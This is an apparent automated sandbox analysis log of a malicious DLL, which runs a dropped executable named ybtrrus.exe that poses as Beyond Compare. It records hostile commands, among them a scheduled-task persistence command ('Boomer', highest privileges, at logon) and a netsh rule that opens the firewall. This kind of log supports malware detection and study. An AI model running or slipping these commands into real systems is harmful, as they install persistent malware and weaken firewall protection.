Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C80A180 12_2_6C80A180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6E0140 12_2_6C6E0140
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7481A0 12_2_6C7481A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7DC190 12_2_6C7DC190
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C80C170 12_2_6C80C170
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C71A216 12_2_6C71A216
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7E2210 12_2_6C7E2210
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6B02E0 12_2_6C6B02E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C818220 12_2_6C818220
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C850240 12_2_6C850240
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C84A3A0 12_2_6C84A3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C747C60 12_2_6C747C60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C847C91 12_2_6C847C91
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C83BC40 12_2_6C83BC40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7E9CB0 12_2_6C7E9CB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C781D60 12_2_6C781D60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7E7DB0 12_2_6C7E7DB0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7E3E60 12_2_6C7E3E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6DFE20 12_2_6C6DFE20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C80BE00 12_2_6C80BE00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C857E00 12_2_6C857E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6B7F40 12_2_6C6B7F40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C855FC0 12_2_6C855FC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C747F00 12_2_6C747F00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6A9F80 12_2_6C6A9F80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C817880 12_2_6C817880
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7A1830 12_2_6C7A1830
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8578F0 12_2_6C8578F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7E78D0 12_2_6C7E78D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6A7920 12_2_6C6A7920
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6AB910 12_2_6C6AB910
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C799AD0 12_2_6C799AD0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C839A30 12_2_6C839A30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C855B9C 12_2_6C855B9C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7E7B50 12_2_6C7E7B50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C73DB00 12_2_6C73DB00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C84DB17 12_2_6C84DB17
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C809480 12_2_6C809480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C819480 12_2_6C819480
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C6A9560 12_2_6C6A9560
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8055E0 12_2_6C8055E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C819670 12_2_6C819670
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C83B7A0 12_2_6C83B7A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8597F0 12_2_6C8597F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C805080 12_2_6C805080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C7810C0 12_2_6C7810C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C8191D0 12_2_6C8191D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C69D180 12_2_6C69D180
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C84F2F0 12_2_6C84F2F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C859250 12_2_6C859250
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_6C847370 12_2_6C847370
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE44FF0 28_2_6FE44FF0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE56750 28_2_6FE56750
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE49650 28_2_6FE49650
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE58D30 28_2_6FE58D30
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE504C0 28_2_6FE504C0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE4F480 28_2_6FE4F480
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE45400 28_2_6FE45400
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE583E0 28_2_6FE583E0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE543C0 28_2_6FE543C0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE503A4 28_2_6FE503A4
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE50BA0 28_2_6FE50BA0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE44BB0 28_2_6FE44BB0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE50380 28_2_6FE50380
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE44B20 28_2_6FE44B20
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE58A20 28_2_6FE58A20
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE50200 28_2_6FE50200
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE411E0 28_2_6FE411E0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE578E0 28_2_6FE578E0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE598E0 28_2_6FE598E0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE4E87E 28_2_6FE4E87E
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE45850 28_2_6FE45850
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE5D85C 28_2_6FE5D85C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_0545DB30 28_2_0545DB30
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A94EB8 28_2_06A94EB8
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06AD560C 28_2_06AD560C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06ACA410 28_2_06ACA410
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06AF9460 28_2_06AF9460
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A6C5B8 28_2_06A6C5B8
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A63514 28_2_06A63514
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06AC43A4 28_2_06AC43A4
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A6C304 28_2_06A6C304
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06B07374 28_2_06B07374
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A7A0C8 28_2_06A7A0C8
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06AE41E0 28_2_06AE41E0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A65EA8 28_2_06A65EA8
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A6BEC4 28_2_06A6BEC4
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A67CB4 28_2_06A67CB4
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06AE3A2C 28_2_06AE3A2C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06AC6A48 28_2_06AC6A48
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A69BBC 28_2_06A69BBC
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A84B8C 28_2_06A84B8C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A95B10 28_2_06A95B10
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06A7A828 28_2_06A7A828
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06AE4844 28_2_06AE4844
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_06B03924 28_2_06B03924
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E3D134 28_2_05E3D134
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E299D0 28_2_05E299D0
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E261A8 28_2_05E261A8
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E081BA 28_2_05E081BA
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E3E16C 28_2_05E3E16C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E19900 28_2_05E19900
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E080A4 28_2_05E080A4
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E0A854 28_2_05E0A854
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E0A3C4 28_2_05E0A3C4
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E0A768 28_2_05E0A768
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E24B74 28_2_05E24B74
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E0AB08 28_2_05E0AB08
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E15A78 28_2_05E15A78
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E2FA7C 28_2_05E2FA7C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E3A31C 28_2_05E3A31C
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05E3B660 28_2_05E3B660
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: String function: 06A96AF8 appears 34 times
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: String function: 6FE5DE20 appears 37 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6C85CB80 appears 160 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6C85C940 appears 156 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6C85C830 appears 212 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6C84B7E0 appears 49 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6C849ED0 appears 31 times
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 616
Source: T8TY28UxiT.dll Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
Source: T8TY28UxiT.dll Binary string: Afdfd\Device\Afd\Mio
Source: T8TY28UxiT.dll Binary string: Failed to open \Device\Afd\Mio: 8
Source: ybtrrus.exe, 00000021.00000002.2650668938.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: NumberCaseSig Value="False"/>*.frm;*.vb;*.vbp;.vbs"/>
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002A19000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002B19000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: *.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs
Source: ybtrrus.exe, 0000001C.00000000.1884379769.0000000000B31000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: <Mask Value="*.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs"/>
Source: ybtrrus.exe, 0000001C.00000002.2653315436.0000000002A19000.00000004.00001000.00020000.00000000.sdmp, ybtrrus.exe, 00000021.00000002.2653795251.0000000002B19000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: (*.bas;*.cls;*.ctl;*.frm;*.vb;*.vbp;*.vbs@
Source: classification engine Classification label: mal96.spyw.evad.winDLL@66/45@0/8
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_6FE48830 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,LookupPrivilegeValueA,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, 28_2_6FE48830
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467AAE AdjustTokenPrivileges, 28_2_05467AAE
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467D56 GetDiskFreeSpaceW, 28_2_05467D56
Source: C:\iDQiPwFWUp\ybtrrus.exe Code function: 28_2_05467CFE FreeResource, 28_2_05467CFE
Source: C:\iDQiPwFWUp\ybtrrus.exe File created: C:\Users\user\AppData\Roaming\Scooter Software
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\BeyondCompare3
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5812:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7732
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5472:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7636:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1c9c$432c4c
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7292
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7204
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1e34
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7620
Source: C:\pnVcakKiqh\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1d78
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7604
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7208
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7924
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8036
Source: C:\pnVcakKiqh\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1d88$432c4c
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7188
Source: C:\pnVcakKiqh\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\MutexNPA_UnitVersioning_7544
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\BeyondCompare3
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madExceptSettingsMtx$1c7c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8108:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7532:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8136:120:WilError_03
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\Beyond Compare: BE887BC7-16B2-48B5-B618-B3A52A26EC10
Source: C:\iDQiPwFWUp\ybtrrus.exe Mutant created: \Sessions\1\BaseNamedObjects\madToolsMsgHandlerMutex$1e9c$432c4c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8040:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\e1a9ee5b-b3ff-45ea-9647-c8dc25e5e75d
Source: Yara match File source: 28.0.ybtrrus.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000000.1882294769.0000000000401000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: T8TY28UxiT.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\iDQiPwFWUp\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\pnVcakKiqh\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\pnVcakKiqh\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\iDQiPwFWUp\ybtrrus.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain
Source: T8TY28UxiT.dll ReversingLabs: Detection: 15%
Source: ybtrrus.exe String found in binary or memory: NATS-DANO-ADD
Source: ybtrrus.exe String found in binary or memory: NATS-SEFI-ADD
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll"
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 616
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 544
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,bz_internal_error
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 660
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,g2mcomm_winmain
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 608
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",DllMain
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",bz_internal_error
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",g2mcomm_winmain
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 656
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7188 -s 608
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7208 -s 616
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 672
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7204 -s 684
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: unknown Process created: C:\iDQiPwFWUp\ybtrrus.exe C:\iDQiPwFWUp\ybtrrus.exe
Source: C:\pnVcakKiqh\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\pnVcakKiqh\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\pnVcakKiqh\ybtrrus.exe" enable=yes profile=any
Source: C:\pnVcakKiqh\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /flushdns
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,DllMain
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,bz_internal_error
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\T8TY28UxiT.dll,g2mcomm_winmain
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",DllMain
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",bz_internal_error
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",g2mcomm_winmain
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\T8TY28UxiT.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\iDQiPwFWUp\ybtrrus.exe "C:\iDQiPwFWUp\ybtrrus.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\pnVcakKiqh\ybtrrus.exe "C:\pnVcakKiqh\ybtrrus.exe"
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\schtasks.exe SCHTASKS /Query /TN "Boomer"
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C SCHTASKS /Create /F /RL HIGHEST /TN "Boomer" /TR "C:\iDQiPwFWUp\ybtrrus.exe" /SC ONLOGON /DELAY 0001:00
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C netsh advfirewall firewall add rule name="ybtrrus" dir=in action=allow program="C:\iDQiPwFWUp\ybtrrus.exe" enable=yes profile=any
Source: C:\iDQiPwFWUp\ybtrrus.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ipconfig /flushdns
